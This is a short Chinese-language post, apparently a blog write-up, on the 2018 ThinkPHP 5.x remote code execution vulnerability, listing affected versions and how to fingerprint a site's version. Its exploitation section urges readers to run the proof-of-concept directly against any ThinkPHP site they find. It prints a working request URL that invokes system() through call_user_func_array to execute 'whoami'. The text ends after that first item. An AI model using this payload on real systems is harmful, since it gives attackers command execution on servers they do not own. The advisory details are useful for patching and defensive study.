前言
ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架
ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,推荐尽快更新到最新版本。
一、漏洞影响范围
5.x < 5.1.31, <= 5.0.23
二、如何确认THINKPHP版本
多数情况下直接引发报错页面即可获取到thinkphp版本信息,也可以通过指纹识别等网站,手段找到。
三、漏洞利用
哪有这么麻烦,见到thinkphp网站直接上POC,直接复制到域名后看响应
1.利用system函数远程命令执行
http://localhost/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami